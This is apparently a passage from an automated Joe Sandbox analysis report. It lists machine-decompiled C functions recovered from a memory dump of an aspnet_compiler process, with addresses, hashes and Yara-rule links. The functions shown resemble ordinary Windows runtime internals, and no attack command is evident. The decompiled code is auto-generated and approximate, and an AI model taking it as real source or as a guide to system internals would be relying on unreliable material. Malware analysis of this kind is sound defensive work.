				_t43 = 1;
				goto L3;
			}












                                                                                        0x011c1dc2
                                                                                        0x011c1dc5
                                                                                        0x011c1dc7
                                                                                        0x011c1dcc
                                                                                        0x011c1dce
                                                                                        0x011c1dd6
                                                                                        0x011c1ddf
                                                                                        0x011c1de0
                                                                                        0x011c1de1
                                                                                        0x011c1de5
                                                                                        0x011c1de8
                                                                                        0x011c1def
                                                                                        0x011c1df0
                                                                                        0x011c1df6
                                                                                        0x011c1df7
                                                                                        0x011c1dfe
                                                                                        0x011c1e1a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011c1e0b
                                                                                        0x011c1e12
                                                                                        0x011c1e12
                                                                                        0x011c1e00
                                                                                        0x011c1e00
                                                                                        0x011c1e05
                                                                                        0x011c1e1e
                                                                                        0x011c1e23
                                                                                        0x0120570f
                                                                                        0x01205713
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01205719
                                                                                        0x01205719
                                                                                        0x011c1e2c
                                                                                        0x011c1e2d
                                                                                        0x011c1e2e
                                                                                        0x011c1e2f
                                                                                        0x011c1e31
                                                                                        0x011c1e32
                                                                                        0x011c1e35
                                                                                        0x011c1e3d
                                                                                        0x01205723
                                                                                        0x0120573d
                                                                                        0x0120573d
                                                                                        0x00000000
                                                                                        0x01205723
                                                                                        0x011c1e49
                                                                                        0x011c1e4e
                                                                                        0x011c1e4e
                                                                                        0x011c1e09
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                        • Instruction ID: 0ab6104479f3330a381d26658d8a2e29da3304bf9d67466798bc20128432ccbf
                                                                                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                        • Instruction Fuzzy Hash: 3B21A331640129FFD71ACF99CC80EABBBBDEF95A44F114059E601D7251D734AD01DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01216C0A Relevance: .1, Instructions: 79COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 77%
                                                                                        			E01216C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E011B7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1287b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L011B4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E011DF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E011B7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E011D9AE0();
						_t23 = L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                                        0x01216c0a
                                                                                        0x01216c0f
                                                                                        0x01216c10
                                                                                        0x01216c13
                                                                                        0x01216c15
                                                                                        0x01216c19
                                                                                        0x01216c1c
                                                                                        0x01216c21
                                                                                        0x01216c28
                                                                                        0x01216c3a
                                                                                        0x01216c2a
                                                                                        0x01216c33
                                                                                        0x01216c33
                                                                                        0x01216c3f
                                                                                        0x01216c48
                                                                                        0x01216c4d
                                                                                        0x01216c60
                                                                                        0x01216c65
                                                                                        0x01216c69
                                                                                        0x01216c73
                                                                                        0x01216c79
                                                                                        0x01216c7f
                                                                                        0x01216c86
                                                                                        0x01216c90
                                                                                        0x01216c94
                                                                                        0x01216ca6
                                                                                        0x01216cb2
                                                                                        0x01216cbd
                                                                                        0x01216cbd
                                                                                        0x01216cc3
                                                                                        0x01216cc7
                                                                                        0x01216ccb
                                                                                        0x01216cd0
                                                                                        0x01216cd1
                                                                                        0x01216ce2
                                                                                        0x01216ce2
                                                                                        0x01216c69
                                                                                        0x01216ced

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d50f1b8cf6dec424346248fe913c78db15cf82a5009b2bc7a2b4043d0dbee3f8
                                                                                        • Instruction ID: 52f682e5c24b243792ea7967d602bee777f2a8fd3a90bdcfe0c279b47cf8784a
                                                                                        • Opcode Fuzzy Hash: d50f1b8cf6dec424346248fe913c78db15cf82a5009b2bc7a2b4043d0dbee3f8
                                                                                        • Instruction Fuzzy Hash: 9221CA72A00645ABD715DF68D884F6AB7A8FF58344F140069FA04CB790E734ED00CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D90AF Relevance: .1, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 82%
                                                                                        			E011D90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E011ED4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E011CE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L011B4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E011DF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E011CA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                                        0x011d90af
                                                                                        0x011d90b8
                                                                                        0x011d90bb
                                                                                        0x011d90bf
                                                                                        0x011d90c2
                                                                                        0x011d90c2
                                                                                        0x011d90c8
                                                                                        0x011d90cb
                                                                                        0x011d90cd
                                                                                        0x012114d7
                                                                                        0x012114eb
                                                                                        0x012114eb
                                                                                        0x00000000
                                                                                        0x012114eb
                                                                                        0x012114db
                                                                                        0x012114e6
                                                                                        0x00000000
                                                                                        0x012114f2
                                                                                        0x012114e8
                                                                                        0x00000000
                                                                                        0x012114e8
                                                                                        0x011d90d8
                                                                                        0x011d90da
                                                                                        0x011d90dd
                                                                                        0x011d90e5
                                                                                        0x00000000
                                                                                        0x011d9139
                                                                                        0x011d90fa
                                                                                        0x011d90fe
                                                                                        0x011d9142
                                                                                        0x00000000
                                                                                        0x011d9142
                                                                                        0x011d9104
                                                                                        0x011d9107
                                                                                        0x011d910b
                                                                                        0x011d9110
                                                                                        0x011d9118
                                                                                        0x011d9147
                                                                                        0x011d9148
                                                                                        0x011d914f
                                                                                        0x011d9150
                                                                                        0x011d9151
                                                                                        0x011d9152
                                                                                        0x011d9156
                                                                                        0x011d915d
                                                                                        0x011d9160
                                                                                        0x011d9168
                                                                                        0x011d916c
                                                                                        0x011d91bc
                                                                                        0x011d91be
                                                                                        0x00000000
                                                                                        0x011d91be
                                                                                        0x011d916e
                                                                                        0x011d9173
                                                                                        0x011d9176
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011d917c
                                                                                        0x011d9180
                                                                                        0x011d91b5
                                                                                        0x00000000
                                                                                        0x011d91b5
                                                                                        0x011d9182
                                                                                        0x011d9185
                                                                                        0x011d9189
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011d918e
                                                                                        0x011d9190
                                                                                        0x011d9198
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011d91a0
                                                                                        0x00000000
                                                                                        0x011d91ad
                                                                                        0x011d91ad
                                                                                        0x011d91b0
                                                                                        0x011d91b1
                                                                                        0x00000000
                                                                                        0x011d9185
                                                                                        0x011d911a
                                                                                        0x011d911c
                                                                                        0x011d911f
                                                                                        0x011d9125
                                                                                        0x011d9127
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                        • Instruction ID: 324399dcd5cb1e50a6df26eef1d940d5de6aee0049c33b0bf3babd3c4c2d16cf
                                                                                        • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                        • Instruction Fuzzy Hash: 44219571A0030AEFDB25DF69C444E9AFBF8EB54724F15846EEA4597200D330ED50CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C3B7A Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 59%
                                                                                        			E011C3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x12884c4; // 0x0
				_v12 = 1;
				_v8 =  *0x12884c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L011B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x12884c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E011DAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E011DFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x12884c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x12884c4; // 0x0
					L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                                        0x011c3b89
                                                                                        0x011c3b96
                                                                                        0x011c3ba1
                                                                                        0x011c3bab
                                                                                        0x011c3bb5
                                                                                        0x011c3bb9
                                                                                        0x01206298
                                                                                        0x011c3bbf
                                                                                        0x011c3bc2
                                                                                        0x011c3bc3
                                                                                        0x011c3bc9
                                                                                        0x011c3bca
                                                                                        0x011c3bcc
                                                                                        0x011c3bcd
                                                                                        0x011c3bd4
                                                                                        0x011c3bd6
                                                                                        0x011c3bdb
                                                                                        0x011c3bea
                                                                                        0x011c3bf7
                                                                                        0x011c3bfb
                                                                                        0x011c3bff
                                                                                        0x011c3c09
                                                                                        0x011c3c0a
                                                                                        0x011c3c0b
                                                                                        0x011c3c0f
                                                                                        0x011c3c14
                                                                                        0x011c3c18
                                                                                        0x011c3c18
                                                                                        0x011c3bfb
                                                                                        0x011c3c1b
                                                                                        0x011c3c30
                                                                                        0x011c3c30
                                                                                        0x011c3c3d

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: aab5ff53c8122471fae9dffd11a341093cb46e302cafa2f3fff8abe95b9779f6
                                                                                        • Instruction ID: 1f60f1f5ccea6e7c79b06e159f466ddec58ed68db0ecff39d9c26905c4bef892
                                                                                        • Opcode Fuzzy Hash: aab5ff53c8122471fae9dffd11a341093cb46e302cafa2f3fff8abe95b9779f6
                                                                                        • Instruction Fuzzy Hash: A121D472A00105AFD714DF98DD81F5EBBBDFB44708F154069E605AB252C371ED01CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01216CF0 Relevance: .1, Instructions: 74COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 80%
                                                                                        			E01216CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E011B7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E011B7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1175c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E011CF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E011CF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01217016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L011B2400( &_v52);
								}
								_t21 = L011B2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                                        0x01216cfb
                                                                                        0x01216d00
                                                                                        0x01216d02
                                                                                        0x01216d06
                                                                                        0x01216d0a
                                                                                        0x01216d0e
                                                                                        0x01216d19
                                                                                        0x01216d2b
                                                                                        0x01216d1b
                                                                                        0x01216d24
                                                                                        0x01216d24
                                                                                        0x01216d33
                                                                                        0x01216d39
                                                                                        0x01216d46
                                                                                        0x01216d4f
                                                                                        0x01216d61
                                                                                        0x01216d51
                                                                                        0x01216d5a
                                                                                        0x01216d5a
                                                                                        0x01216d69
                                                                                        0x01216d6b
                                                                                        0x01216d6d
                                                                                        0x01216d6f
                                                                                        0x01216d6f
                                                                                        0x01216d74
                                                                                        0x01216d79
                                                                                        0x01216d7a
                                                                                        0x01216d7f
                                                                                        0x01216d82
                                                                                        0x01216d88
                                                                                        0x01216d89
                                                                                        0x01216d90
                                                                                        0x01216d94
                                                                                        0x01216da7
                                                                                        0x01216db1
                                                                                        0x01216db1
                                                                                        0x01216dbb
                                                                                        0x01216dbb
                                                                                        0x01216d90
                                                                                        0x01216d69
                                                                                        0x01216d46
                                                                                        0x01216dc6

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e2b34f02b4f2564c30c96389e9a6da210e80ce756ab4dbd9b9629b5a95e20fe2
                                                                                        • Instruction ID: 8c1b3eab10d3087977d63b5a6d7350c370604876e05d2e293eb475e3f627aa0f
                                                                                        • Opcode Fuzzy Hash: e2b34f02b4f2564c30c96389e9a6da210e80ce756ab4dbd9b9629b5a95e20fe2
                                                                                        • Instruction Fuzzy Hash: 9D21347241034A9BD311DF28C944BAFBBECEFA1644F04085AFA40C7290E774D948C6A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0126070D Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 67%
                                                                                        			E0126070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E012607DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0125AFDE( &_v8,  &_v12);
					E01261293(_t38, _v28, _t60);
					if(E011B7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E012514FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                                        0x0126071b
                                                                                        0x01260724
                                                                                        0x01260734
                                                                                        0x01260738
                                                                                        0x0126074b
                                                                                        0x0126074b
                                                                                        0x01260753
                                                                                        0x01260753
                                                                                        0x01260759
                                                                                        0x0126075d
                                                                                        0x01260774
                                                                                        0x01260779
                                                                                        0x0126077d
                                                                                        0x01260789
                                                                                        0x01260795
                                                                                        0x012607a7
                                                                                        0x01260797
                                                                                        0x012607a0
                                                                                        0x012607a0
                                                                                        0x012607af
                                                                                        0x012607c4
                                                                                        0x012607cd
                                                                                        0x012607cd
                                                                                        0x012607af
                                                                                        0x012607dc

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                        • Instruction ID: dd7da6e3d4985e083c63b1cc72b570c6eec6d0e610b000592ed390cd7c684485
                                                                                        • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                        • Instruction Fuzzy Hash: C42134362142019FD70ADF18C880B6ABBA9EFD0350F048629FA948B3C5C734DC49CB95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01217794 Relevance: .1, Instructions: 70COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 82%
                                                                                        			E01217794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1287b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L011B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E011DF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E011B7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E011D9AE0();
					_t24 = L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                                        0x01217799
                                                                                        0x0121779a
                                                                                        0x0121779b
                                                                                        0x012177a3
                                                                                        0x012177ab
                                                                                        0x012177ae
                                                                                        0x012177b1
                                                                                        0x012177b1
                                                                                        0x012177bf
                                                                                        0x012177c4
                                                                                        0x012177c8
                                                                                        0x012177ce
                                                                                        0x012177d4
                                                                                        0x012177e0
                                                                                        0x012177e0
                                                                                        0x012177d6
                                                                                        0x012177d6
                                                                                        0x012177de
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x012177de
                                                                                        0x012177e5
                                                                                        0x012177f0
                                                                                        0x012177f3
                                                                                        0x012177f6
                                                                                        0x012177fd
                                                                                        0x01217800
                                                                                        0x0121780c
                                                                                        0x01217818
                                                                                        0x0121782b
                                                                                        0x0121781a
                                                                                        0x01217823
                                                                                        0x01217823
                                                                                        0x01217830
                                                                                        0x01217831
                                                                                        0x01217838
                                                                                        0x0121783d
                                                                                        0x0121783e
                                                                                        0x0121784f
                                                                                        0x0121784f
                                                                                        0x0121785a

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6d487825ca5af577822275afefb90d5103eaaa91dd02ccedeb9508a995b2d82a
                                                                                        • Instruction ID: 42abbafe8f5a68c1b535f2f8b44243958830d69d785cbc9dfb1fb4d6d3226683
                                                                                        • Opcode Fuzzy Hash: 6d487825ca5af577822275afefb90d5103eaaa91dd02ccedeb9508a995b2d82a
                                                                                        • Instruction Fuzzy Hash: 5821A472510605ABC729DF69D880E9BBBE9EF98340F10456DFA0AC7750E734D901CB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011BAE73 Relevance: .1, Instructions: 70COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 96%
                                                                                        			E011BAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E011B7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E011B7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E011B7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E011B7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01217794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                                                        0x011bae78
                                                                                        0x011bae7c
                                                                                        0x011bae7e
                                                                                        0x011bae81
                                                                                        0x011bae86
                                                                                        0x011bae8d
                                                                                        0x01202691
                                                                                        0x011bae93
